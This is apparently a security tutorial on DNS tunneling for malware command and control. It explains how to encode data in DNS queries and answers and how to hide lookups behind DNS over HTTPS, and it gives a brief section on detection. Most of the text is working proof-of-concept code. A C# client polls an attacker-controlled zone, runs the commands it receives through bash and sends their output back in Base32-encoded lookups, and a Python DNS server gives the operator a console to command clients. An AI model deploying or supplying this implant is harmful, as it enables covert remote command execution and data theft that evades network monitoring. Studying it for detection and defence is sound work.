The Domain Name System (DNS) is used to resolve hostnames to their associated IP addresses. DNS can also be used as a transport mechanism for malware Command & Control (C2) messages. This is useful to an attacker when a restrictive web proxy makes connecting outbound over HTTP difficult, because internal hosts can usually still resolve external names.
The concept of DNS tunneling is simple. An attacker configures nameserver (NS) records that delegate a zone to their C2 server. For instance, they could configure an NS record for c2.malware.com, so that queries from any host for subdomains such as subdomain.c2.malware.com are sent to that server.
In a corporate environment, a client typically sends its DNS requests to an internal DNS server. If that server is unable to answer a query itself, it queries the root servers and follows the delegation chain. The DNS client never connects directly to the attacker’s server.
Data from the client to the DNS server can be encoded within the name being looked up in an A record query. For example, a client could make a request for test1.c2.malware.com, and the server can read the first label to determine that the client’s ID is test1. The server can acknowledge this query by encoding data in the IP address it returns. For instance, using one ASCII character code per octet, the server could return the letters “wait” by responding with the IP address 119.97.105.116.
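The ASCII-in-an-IP-address idea can be illustrated with a short Python sketch. The function names `encode_ascii_as_ipv4()` and `decode_ipv4_as_ascii()` are hypothetical. They mirror the behaviour of the server’s `encodecommand()` and the client’s `DecodeCommand()` rather than reproduce them. Each octet holds the code of one character, so a single A record carries at most four characters. Shorter strings are padded with spaces.

```python
def encode_ascii_as_ipv4(text: str) -> str:
    """Encode up to four ASCII characters as a dotted-quad IPv4 string."""
    if len(text) > 4:
        raise ValueError("an A record can only carry four characters")
    codes = [ord(ch) for ch in text]
    if any(code > 127 for code in codes):
        raise ValueError("only ASCII characters are supported")
    # Pad short strings with spaces (ASCII 32), as the server's encodecommand() does
    codes += [32] * (4 - len(codes))
    return ".".join(str(code) for code in codes)


def decode_ipv4_as_ascii(address: str) -> str:
    """Map each octet of a dotted-quad address back to its ASCII character."""
    return "".join(chr(int(octet)) for octet in address.split("."))


print(encode_ascii_as_ipv4("wait"))            # 119.97.105.116
print(decode_ipv4_as_ascii("119.97.105.116"))  # wait
```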
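To upload larger amounts of data from the client to the server, the data can be Base32 encoded. Base32 is a suitable encoding mechanism because its alphabet (A-Z and 2-7) only uses characters that are permitted in domain names. It also does not depend on letter case, which matters because DNS names are compared case-insensitively.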
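The sketch below uses Python’s standard `base64` module to show how a chunk of data becomes a DNS label. The helper names and the checks are illustrative assumptions, not part of the original client. Two constraints are worth noting:

- A single DNS label is limited to 63 characters (RFC 1035).
- The `=` padding character is not valid in a hostname, so chunk sizes that are a multiple of 5 bytes are convenient. Five bytes encode to exactly eight Base32 characters with no padding.

Decoding with `casefold=True` tolerates resolvers that change the case of the query name.

```python
import base64

MAX_LABEL_LENGTH = 63  # RFC 1035: a single DNS label is at most 63 octets


def to_dns_label(chunk: bytes) -> str:
    """Base32-encode a chunk of bytes so it can be used as a DNS label."""
    label = base64.b32encode(chunk).decode("ascii")
    if "=" in label:
        # '=' is not valid in a hostname; chunk lengths that are multiples of 5 avoid it
        raise ValueError("chunk length must be a multiple of 5 bytes")
    if len(label) > MAX_LABEL_LENGTH:
        raise ValueError("encoded chunk does not fit in a single label")
    return label


def from_dns_label(label: str) -> bytes:
    """Decode a Base32 label, accepting lower case in case a resolver altered it."""
    return base64.b32decode(label, casefold=True)


label = to_dns_label(b"hello from the dns client 1234")  # 30 bytes
print(len(label))                     # 48
print(from_dns_label(label.lower()))  # b'hello from the dns client 1234'
```

With 30-byte chunks (the size the client below uses), each label is 48 characters, leaving room for a short client ID prefix within the 63-character limit.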
DNS tunneling is not restricted to A records. Other record types such as AAAA or TXT can also be used. They offer more space per response for encoded messages, and therefore increase throughput.
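To put the capacity difference in numbers:

- An A record answer carries 4 bytes.
- An AAAA answer carries 16 bytes.
- A TXT record holds one or more character-strings of up to 255 bytes each (RFC 1035).

The hypothetical helpers below pack up to 16 bytes into an IPv6 address using Python’s `ipaddress` module. This is a sketch under the assumption that the payload never ends in NUL bytes, since those are used as padding and stripped on decode.

```python
import ipaddress


def encode_bytes_as_ipv6(data: bytes) -> str:
    """Pack up to 16 bytes into an IPv6 address, zero-padding on the right."""
    if len(data) > 16:
        raise ValueError("an AAAA record carries at most 16 bytes")
    return str(ipaddress.IPv6Address(data.ljust(16, b"\x00")))


def decode_ipv6_as_bytes(address: str) -> bytes:
    """Unpack an IPv6 address and drop the trailing zero padding."""
    return ipaddress.IPv6Address(address).packed.rstrip(b"\x00")


address = encode_bytes_as_ipv6(b"waiting for cmd")  # 15 bytes in one answer
print(address)
print(decode_ipv6_as_bytes(address))  # b'waiting for cmd'
```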
When a client communicates with a server, each request needs to be unique. Otherwise, intermediary DNS servers may answer from their cache and the query never reaches the C2 server.
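One way to make every query unique is to append a random nonce to the client ID, which is what the C# client below does with two 5-character strings. This Python sketch builds names the same way. `beacon_name()` is a hypothetical helper, and `secrets` is used here in place of the C# `Random` class. With 36 possible characters per position, a 5-character nonce has 36^5 (about 60 million) values, so repeats are unlikely over a session.

```python
import secrets
import string

# Same alphabet as the C# RandomString() helper
ALPHABET = string.ascii_uppercase + string.digits


def beacon_name(client_id: str, zone: str, nonce_length: int = 5) -> str:
    """Build a cache-busting query name: <client id><random nonce>.<zone>."""
    nonce = "".join(secrets.choice(ALPHABET) for _ in range(nonce_length))
    return f"{client_id}{nonce}.{zone}"


first = beacon_name("AB12C", "c2.mydomain.com")
second = beacon_name("AB12C", "c2.mydomain.com")
print(first, second)  # almost certainly two different names
```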
DNS Record Configuration
The DNS records below were configured using GoDaddy’s DNS manager.
Type | Name | Value | TTL (seconds) |
A | NS1 | 1.1.1.1 | 900 |
NS | C2 | ns1.mydomain.com | 900 |
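With these records in place, queries for any name under c2.mydomain.com (such as subdomain.c2.mydomain.com) are delegated to ns1.mydomain.com, which resolves to the IP address of our C2 server (1.1.1.1 in this example).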
DNS Over HTTPS (DoH)
DoH is a way of performing DNS lookups over an HTTPS connection.
Cloudflare provide documentation on how to perform these requests. Using DoH has a couple of benefits from an attacker’s perspective:
- Traffic is encrypted by default. Unless HTTPS inspection is being performed, network analytics systems will not be able to interrogate the traffic.
- The client network will only see connections to the DoH provider’s infrastructure, masking the real destination of the traffic.
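A DoH lookup against Cloudflare’s JSON API is an ordinary HTTPS GET request with an `Accept: application/dns-json` header. The addresses come back in the `Answer` array of the JSON body. The following Python sketch uses only the standard library; the function names are hypothetical.

It keeps only answers of type 1 (A), so a CNAME in the chain is not mistaken for an address. The C# client below instead takes the `data` field of the last answer. The sample body is illustrative and uses the documentation address 192.0.2.1.

```python
import json
import urllib.parse
import urllib.request

DOH_ENDPOINT = "https://cloudflare-dns.com/dns-query"  # Cloudflare's public DoH endpoint


def build_doh_request(name: str, record_type: str = "A") -> urllib.request.Request:
    """Build a GET request for Cloudflare's JSON DoH API."""
    query = urllib.parse.urlencode({"name": name, "type": record_type})
    return urllib.request.Request(
        f"{DOH_ENDPOINT}?{query}", headers={"Accept": "application/dns-json"}
    )


def a_records_from_json(body: str) -> list[str]:
    """Return the data field of every A answer (type 1); CNAMEs and others are skipped."""
    answers = json.loads(body).get("Answer", [])
    return [answer["data"] for answer in answers if answer.get("type") == 1]


def doh_lookup(name: str) -> list[str]:
    """Perform the lookup over HTTPS (requires network access)."""
    with urllib.request.urlopen(build_doh_request(name), timeout=10) as response:
        return a_records_from_json(response.read().decode("utf-8"))


sample = '{"Status": 0, "Answer": [{"name": "example.com", "type": 1, "TTL": 300, "data": "192.0.2.1"}]}'
print(a_records_from_json(sample))  # ['192.0.2.1']
```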
DNS Tunneling Detection
There are a number of things defenders can do to detect and prevent DNS tunneling:
- Sinkhole known malicious DNS domains.
- Perform DNS frequency analysis. Many SIEM systems provide use cases that trigger on a large increase in DNS requests from a single host.
- Most DNS C2 clients rely on Base32 or similar encoding mechanisms. This results in lookups with long, random-looking subdomain labels that contain many digits. This is unusual behavior, and again can be alerted on.
- Block direct outbound DNS connections at a firewall level. DNS traffic should only be allowed to leave the organisation from internal DNS servers.
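The encoded-label indicator can be prototyped with a simple heuristic. The following Python sketch flags a query when its leftmost label is:

- long,
- purely alphanumeric, and
- high in Shannon entropy (bits per character).

The thresholds of 30 characters and 3.5 bits are assumptions chosen for illustration, not tuned values. Legitimate services such as CDNs and security products also generate long random labels, so in practice this would be combined with per-host query volume and an allow-list.

```python
import math
import re
from collections import Counter

# Letters and digits only, covering Base32 (A-Z, 2-7) and the client ID alphabet
ENCODED_LABEL = re.compile(r"^[A-Za-z0-9]+$")


def shannon_entropy(text: str) -> float:
    """Bits per character of the label's character distribution."""
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_like_tunnel(qname: str, min_length: int = 30, min_entropy: float = 3.5) -> bool:
    """Flag a query whose leftmost label is long, alphanumeric and high-entropy."""
    label = qname.split(".")[0]
    return (
        len(label) >= min_length
        and ENCODED_LABEL.match(label) is not None
        and shannon_entropy(label) >= min_entropy
    )


print(looks_like_tunnel("www.example.com"))                                  # False
print(looks_like_tunnel("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567.c2.example.com"))  # True
```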
Creating a Proof of Concept Client
Below is a .NET 6 C# client for macOS. The client uses A records to carry data, and performs lookups using either standard DNS or DoH.
A Python DNS server is also provided. The server does not support DoH directly. Instead, the DoH service used by the client (in this case Cloudflare) resolves the query and sends a standard DNS request to the server.
C# Client Code
using System.Diagnostics;
using System.Net;
using System.Text;
using DnsClient;
using System.Net.Http.Headers;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
public static class c2client
{
//Config variables
static String C2Server = ".test.bordergate.co.uk";
// Client poll time in milliseconds
static int C2delay = 2000;
// Placeholder ClientID (will be randomly generated)
static String ClientID = "XXXXX";
// Use Cloudflare DNS over HTTPS
static int UseDOH = 1;
private static Random random = new Random();
public static string RandomString(int length)
{
const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
return new string(Enumerable.Repeat(chars, length)
.Select(s => s[random.Next(s.Length)]).ToArray());
}
public static string DecodeCommand(string address)
//Convert IP address returned by server to ASCII
{
String result = "error";
try
{
string[] octets = address.Split('.');
result = "";
foreach (var octet in octets)
{
int unicode = Convert.ToInt32(octet);
char character = (char)unicode;
string text = character.ToString();
result += text;
}
}
catch
{
Console.WriteLine("Error splitting string: " + address);
}
return result;
}
public static string DOHLookup(string domain)
// Performs lookup using Cloudflare DOH
{
String ipv4 = "";
try
{
string apiEndpoint = "https://1.1.1.1/dns-query?name=";
using (var client = new HttpClient())
{
client.DefaultRequestHeaders
.Accept
.Add(new MediaTypeWithQualityHeaderValue("application/dns-json"));
var response = client.GetAsync(apiEndpoint + domain).GetAwaiter().GetResult();
if (response.IsSuccessStatusCode)
{
var responseContent = response.Content;
string results = responseContent.ReadAsStringAsync().GetAwaiter().GetResult();
Console.WriteLine(results);
dynamic dynObj = JsonConvert.DeserializeObject(results);
foreach (var answer in dynObj.Answer)
{
ipv4 = answer.data;
}
}
}
}
catch
{
Console.WriteLine("DOH lookup failed");
}
return ipv4;
}
public static string IPLookup(String domain)
//Resolve a domain to IP address
{
string ip = "";
if (UseDOH == 1)
{
ip = DOHLookup(domain);
}
else {
var client = new LookupClient(
new LookupClientOptions(NameServer.GooglePublicDns)
{
UseCache = false,
EnableAuditTrail = false,
Retries = 10,
Timeout = TimeSpan.FromSeconds(20),
ThrowDnsErrors = false
});
foreach (var aRecord in client.Query(domain, QueryType.A).Answers.ARecords())
{
ip = aRecord.Address.ToString();
}
}
return ip;
}
public static void GetCommands()
// make a DNS request with a 5 character client ID, and 5 character random value (to prevent caching issues)
{
// Assign the static field (not a local) so UploadResults() sends the same client ID
ClientID = RandomString(5);
String CommandBuffer = "";
while (true)
{
String request = ClientID + RandomString(5).ToString() + C2Server;
String address = IPLookup(request);
if (address == "")
{
Console.WriteLine("DNS Lookup failed: " + request);
Console.WriteLine("Sleeping 10 seconds...");
System.Threading.Thread.Sleep(10000);
}
else
{
String command = DecodeCommand(address.ToString());
Console.WriteLine(DateTime.Now.ToString("THH:mm:ss") + " Server:" + command);
if (command == "wait")
{
// do nothing
}
else if (command == "::::")
{
// :::: signifies that the buffered command should be executed
Console.WriteLine(DateTime.Now.ToString("THH:mm:ss") + " Running command: '" + CommandBuffer + "'");
UploadResults(ExecCommand(CommandBuffer.Trim()));
CommandBuffer = "";
}
else
{
CommandBuffer += command;
}
}
System.Threading.Thread.Sleep(C2delay);
}
}
public static string ExecCommand(String command)
// Execute a command
{
try
{
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.FileName = "bash";
p.StartInfo.Arguments = " -c \"" + command + "\"";
p.Start();
string output = p.StandardOutput.ReadToEnd();
p.WaitForExit();
Console.Write(output);
return output;
}
catch {
Console.WriteLine("Error running command");
return "Error running command: '" + command + "'";
}
}
public static string UploadResults(String results)
// Send results back to the server in 30-byte chunks, each Base32 encoded into an A record lookup.
{
IEnumerable<string> chunks = results.Split(30);
foreach (string chunk in chunks)
{
if (chunk.Length != 30)
{
Console.WriteLine("Padding small chunk: " + chunk.Length);
String paddedchunk = chunk.PadRight(30, '^');
String Base32Encoded = DNSC2.Base32Encoding.ToString(Encoding.ASCII.GetBytes(paddedchunk));
Console.WriteLine(Base32Encoded);
IPLookup(ClientID + Base32Encoded + C2Server);
}
else
{
String Base32Encoded = DNSC2.Base32Encoding.ToString(Encoding.ASCII.GetBytes(chunk));
Console.WriteLine(Base32Encoded);
IPLookup(ClientID + Base32Encoded + C2Server);
}
}
return "";
}
public static void Main()
{
GetCommands();
}
}
public static class Extensions
{
public static IEnumerable<string> Split(this string str, int n)
{
if (String.IsNullOrEmpty(str) || n < 1)
{
// Nothing to split (or an invalid chunk size): return an empty sequence
yield break;
}
for (int i = 0; i < str.Length; i += n)
{
yield return str.Substring(i, Math.Min(n, str.Length - i));
}
}
}
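The upload path in `UploadResults()` can be modelled in a few lines of Python, together with the decoding the server performs. This is a sketch that assumes ASCII command output, and the function names are hypothetical. Non-ASCII characters are replaced with `?`, matching how `Encoding.ASCII` behaves in .NET.

Each chunk is padded with `^` to exactly 30 bytes. Every label is therefore the 5-character client ID plus 48 Base32 characters, 53 characters in total, under the 63-character label limit.

```python
import base64

CHUNK_SIZE = 30  # bytes per lookup, as in UploadResults()
PAD_CHAR = "^"   # padding added by the client and stripped by the server


def upload_labels(client_id: str, output: str) -> list[str]:
    """Split command output into padded 30-byte chunks and Base32-encode each one."""
    labels = []
    for start in range(0, len(output), CHUNK_SIZE):
        chunk = output[start:start + CHUNK_SIZE].ljust(CHUNK_SIZE, PAD_CHAR)
        encoded = base64.b32encode(chunk.encode("ascii", errors="replace")).decode("ascii")
        labels.append(client_id + encoded)
    return labels


def reassemble(labels: list[str]) -> str:
    """Server side: drop the 5-character client ID, decode, and strip the padding."""
    decoded = (base64.b32decode(label[5:], casefold=True).decode("ascii") for label in labels)
    return "".join(decoded).replace(PAD_CHAR, "")


output = "uid=501(user) gid=20(staff) groups=20(staff)\n"
labels = upload_labels("AB12C", output)
print([len(label) for label in labels])  # [53, 53]
print(reassemble(labels) == output)      # True
```

A side effect of this padding scheme is that any literal `^` in the command output is also removed on the server.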
Client Base32 Encoding Library
using System;
namespace DNSC2
{
public static class Base32Encoding
{
public static byte[] ToBytes(string input)
{
if (string.IsNullOrEmpty(input))
{
throw new ArgumentNullException("input");
}
input = input.TrimEnd('='); //remove padding characters
int byteCount = input.Length * 5 / 8; //this must be TRUNCATED
byte[] returnArray = new byte[byteCount];
byte curByte = 0, bitsRemaining = 8;
int mask = 0, arrayIndex = 0;
foreach (char c in input)
{
int cValue = CharToValue(c);
if (bitsRemaining > 5)
{
mask = cValue << (bitsRemaining - 5);
curByte = (byte)(curByte | mask);
bitsRemaining -= 5;
}
else
{
mask = cValue >> (5 - bitsRemaining);
curByte = (byte)(curByte | mask);
returnArray[arrayIndex++] = curByte;
curByte = (byte)(cValue << (3 + bitsRemaining));
bitsRemaining += 3;
}
}
//if we didn't end with a full byte
if (arrayIndex != byteCount)
{
returnArray[arrayIndex] = curByte;
}
return returnArray;
}
public static string ToString(byte[] input)
{
if (input == null || input.Length == 0)
{
throw new ArgumentNullException("input");
}
int charCount = (int)Math.Ceiling(input.Length / 5d) * 8;
char[] returnArray = new char[charCount];
byte nextChar = 0, bitsRemaining = 5;
int arrayIndex = 0;
foreach (byte b in input)
{
nextChar = (byte)(nextChar | (b >> (8 - bitsRemaining)));
returnArray[arrayIndex++] = ValueToChar(nextChar);
if (bitsRemaining < 4)
{
nextChar = (byte)((b >> (3 - bitsRemaining)) & 31);
returnArray[arrayIndex++] = ValueToChar(nextChar);
bitsRemaining += 5;
}
bitsRemaining -= 3;
nextChar = (byte)((b << bitsRemaining) & 31);
}
//if we didn't end with a full char
if (arrayIndex != charCount)
{
returnArray[arrayIndex++] = ValueToChar(nextChar);
while (arrayIndex != charCount) returnArray[arrayIndex++] = '='; //padding
}
return new string(returnArray);
}
private static int CharToValue(char c)
{
int value = (int)c;
//65-90 == uppercase letters
if (value < 91 && value > 64)
{
return value - 65;
}
//50-55 == numbers 2-7
if (value < 56 && value > 49)
{
return value - 24;
}
//97-122 == lowercase letters
if (value < 123 && value > 96)
{
return value - 97;
}
throw new ArgumentException("Character is not a Base32 character.", "c");
}
private static char ValueToChar(byte b)
{
if (b < 26)
{
return (char)(b + 65);
}
if (b < 32)
{
return (char)(b + 24);
}
throw new ArgumentException("Byte is not a valid Base32 value.", "b");
}
}
}
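The `Base32Encoding` class above is intended to produce standard RFC 4648 Base32 (alphabet A-Z and 2-7, with `=` padding). A quick way to sanity-check it, or any port of it, is to compare its output with the test vectors from RFC 4648 section 10. Python’s `base64` module implements the same encoding, as this short check shows. Note that the C# `ToString()` throws on empty input, so the empty vector only applies to the Python side.

```python
import base64

# Test vectors from RFC 4648, section 10
RFC4648_BASE32_VECTORS = {
    b"": "",
    b"f": "MY======",
    b"fo": "MZXQ====",
    b"foo": "MZXW6===",
    b"foob": "MZXW6YQ=",
    b"fooba": "MZXW6YTB",
    b"foobar": "MZXW6YTBOI======",
}

for raw, expected in RFC4648_BASE32_VECTORS.items():
    assert base64.b32encode(raw).decode("ascii") == expected
    assert base64.b32decode(expected) == raw
print("all RFC 4648 Base32 vectors match")
```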
Python Server Code
#!/usr/bin/env python3
import argparse
import base64
import datetime
import sys
import time
import threading
import traceback
import socketserver
import struct
from dnslib import *
import logging
clientdict = {}
commandlist = []
clientid = ''
activeclient = ""
class DomainName(str):
    # Attribute access builds subdomains, e.g. D.ns1 -> 'ns1.' when D is the empty name
    def __getattr__(self, item):
        return DomainName(item + '.' + self)
D = DomainName('')
IP = '1.1.1.1'
TTL = 1 * 5
soa_record = SOA(
mname=D.ns1, # primary name server
rname=D.test, # email of the domain administrator
times=(
201307231, # serial number
60 * 60 * 1, # refresh
60 * 60 * 3, # retry
60 * 60 * 24, # expire
60 * 60 * 1, # minimum
)
)
ns_records = [NS(D.ns1), NS(D.ns2)]
records = {}
def encodecommand(raw_command):
    # Take part of a command (up to 4 characters) and encode it in an IP address.
    # Each octet holds the ASCII code of one character; unused octets are spaces (32).
    responsearray = [32, 32, 32, 32]
    for i, letter in enumerate(raw_command):
        responsearray[i] = ord(letter)
    return ".".join(str(octet) for octet in responsearray)
def c2logic(qn):
    # Check the domain requested. Supply commands back to the client.
    global commandlist
    global clientid
    global clientdict
    global activeclient
    requestarray = qn.split(".")
    clientid = requestarray[0][:5]
    if clientid not in clientdict:
        print("new connection from: " + clientid)
        dt = datetime.datetime.now()
        clientdict[clientid] = str(dt)
    if (len(clientid) == 5) and (clientid == activeclient):
        if len(commandlist) != 0:
            logging.info("SERVER RESPONSE")
            logging.info(commandlist)
            logging.info(commandlist[0])
            response = commandlist.pop(0)
        else:
            response = encodecommand("wait")
    else:
        # Only the active client receives commands; everyone else is told to wait
        logging.info("WAITING")
        response = encodecommand("wait")
    return response
def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    qtype = request.q.qtype
    qt = QTYPE[qtype]
    D = qn
    logging.info("CLIENT REQUEST: " + qn)
    command = qn.split('.')[0]
    # If the first label is 10 characters long (client ID + nonce), it's a beacon requesting a command
    if len(command) == 10:
        IP = c2logic(qn)
        if IP == '58.58.58.58':
            commandlist.clear()
        records = {D: [A(IP), AAAA((0,) * 16), soa_record]}
        for name, rrs in records.items():
            if name == qn:
                for rdata in rrs:
                    rqt = rdata.__class__.__name__
                    if qt in ['*', rqt]:
                        reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=TTL, rdata=rdata))
                for rdata in ns_records:
                    reply.add_ar(RR(rname=D, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=rdata))
                reply.add_auth(RR(rname=D, rtype=QTYPE.SOA, rclass=1, ttl=TTL, rdata=soa_record))
    else:
        # If not a beacon, it's a chunk of command output uploaded by the client
        logging.info("CLIENT RESPONSE " + command)
        command = command[5:]  # strip the 5-character client ID
        logging.info("COMMAND " + command)
        # casefold=True tolerates resolvers that change the case of the query name
        decoded = base64.b32decode(command, casefold=True).decode('utf-8')
        logging.info(decoded)
        print(decoded.replace('^', ''), end='')
        IP = "9.9.9.9"
        records = {D: [A(IP), AAAA((0,) * 16), soa_record]}
        for name, rrs in records.items():
            if name == qn:
                for rdata in rrs:
                    rqt = rdata.__class__.__name__
                    if qt in ['*', rqt]:
                        reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=TTL, rdata=rdata))
                for rdata in ns_records:
                    reply.add_ar(RR(rname=D, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=rdata))
                reply.add_auth(RR(rname=D, rtype=QTYPE.SOA, rclass=1, ttl=TTL, rdata=soa_record))
    return reply.pack()
class BaseRequestHandler(socketserver.BaseRequestHandler):
    def get_data(self):
        raise NotImplementedError
    def send_data(self, data):
        raise NotImplementedError
    def handle(self):
        try:
            data = self.get_data()
            self.send_data(dns_response(data))
        except Exception:
            # Malformed or unexpected queries are ignored; the traceback is shown in debug mode (-d)
            logging.info(traceback.format_exc())
class TCPRequestHandler(BaseRequestHandler):
    def get_data(self):
        # No .strip(): a DNS message is binary and may begin or end with whitespace byte values
        data = self.request.recv(8192)
        sz = struct.unpack('>H', data[:2])[0]
        if sz < len(data) - 2:
            raise Exception("Wrong size of TCP packet")
        elif sz > len(data) - 2:
            raise Exception("Too big TCP packet")
        return data[2:]
    def send_data(self, data):
        sz = struct.pack('>H', len(data))
        return self.request.sendall(sz + data)
class UDPRequestHandler(BaseRequestHandler):
    def get_data(self):
        # No .strip(): stripping could remove bytes belonging to the query ID or EDNS data
        return self.request[0]
    def send_data(self, data):
        return self.request[1].sendto(data, self.client_address)
def main():
    global activeclient
    parser = argparse.ArgumentParser(description='Start a DNS server implemented in Python. Usually DNS servers use UDP on port 53.')
    parser.add_argument('--port', default=53, type=int, help='The port to listen on.')
    parser.add_argument('--tcp', action='store_true', help='Listen to TCP connections.')
    parser.add_argument('--udp', action='store_true', help='Listen to UDP datagrams.')
    parser.add_argument('-d', action='store_true', help='Debug mode')
    args = parser.parse_args()
    print("Starting nameserver...")
    args.udp = True  # UDP is always enabled; --tcp adds a TCP listener as well
    servers = []
    if args.udp:
        servers.append(socketserver.ThreadingUDPServer(('', args.port), UDPRequestHandler))
    if args.tcp:
        servers.append(socketserver.ThreadingTCPServer(('', args.port), TCPRequestHandler))
    if args.d:
        logging.basicConfig(level=logging.INFO, format='%(asctime)s :: %(levelname)s :: %(message)s')
    for s in servers:
        thread = threading.Thread(target=s.serve_forever)
        thread.daemon = True
        thread.start()
        print("%s server loop running in thread: %s" % (s.RequestHandlerClass.__name__[:3], thread.name))
    try:
        while True:
            # Take user input. Divide it into 4-character chunks and encode each one.
            # The command ends with '::::' (58.58.58.58).
            usercommand = input("\n" + clientid + ">")
            if usercommand == "clients":
                print(clientdict)
            elif usercommand.startswith("active"):
                activeclient = usercommand.split(" ")[1]
                print("active client: " + activeclient)
            else:
                csize = 4
                chunks = [usercommand[i:i+csize] for i in range(0, len(usercommand), csize)]
                for chunk in chunks:
                    commandlist.append(encodecommand(chunk))
                commandlist.append('58.58.58.58')
            sys.stderr.flush()
            sys.stdout.flush()
    except KeyboardInterrupt:
        pass
    finally:
        for s in servers:
            s.shutdown()
if __name__ == '__main__':
    main()
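The command channel between the server’s input loop and the client’s `GetCommands()` loop can be summarised in a small Python model. The server splits a command into 4-character chunks, encodes each chunk as an IP address, and appends `58.58.58.58` (ASCII 58 is `:`). The client decodes each answer, ignores `wait`, and buffers chunks until `::::` arrives. It then executes the trimmed buffer.

The helper names below are hypothetical. This is a sketch of the protocol, not a replacement for either program.

```python
TERMINATOR = "58.58.58.58"  # ASCII 58 is ':', so this decodes to "::::"


def encode_chunk(chunk: str) -> str:
    """Encode up to four characters as an IPv4 address, padding with spaces (32)."""
    codes = [ord(ch) for ch in chunk] + [32] * (4 - len(chunk))
    return ".".join(str(code) for code in codes)


def queue_command(command: str) -> list[str]:
    """Server side: split a command into 4-character chunks and append the terminator."""
    queue = [encode_chunk(command[i:i + 4]) for i in range(0, len(command), 4)]
    queue.append(TERMINATOR)
    return queue


def client_receive(addresses: list[str]) -> list[str]:
    """Client side: buffer decoded chunks until '::::' arrives, then emit the command."""
    commands, buffer = [], ""
    for address in addresses:
        text = "".join(chr(int(octet)) for octet in address.split("."))
        if text == "wait":
            continue  # nothing queued for this client
        if text == "::::":
            commands.append(buffer.strip())  # the C# client also trims the buffer
            buffer = ""
        else:
            buffer += text
    return commands


queue = queue_command("ls -la /tmp")
print(queue)
print(client_receive(["119.97.105.116"] + queue))  # ['ls -la /tmp']
```

Because the control words travel in-band, a command whose text contains `wait` or `::::` exactly on a 4-character boundary would be misread by the client. For example, the first chunk of `waitfor` is dropped.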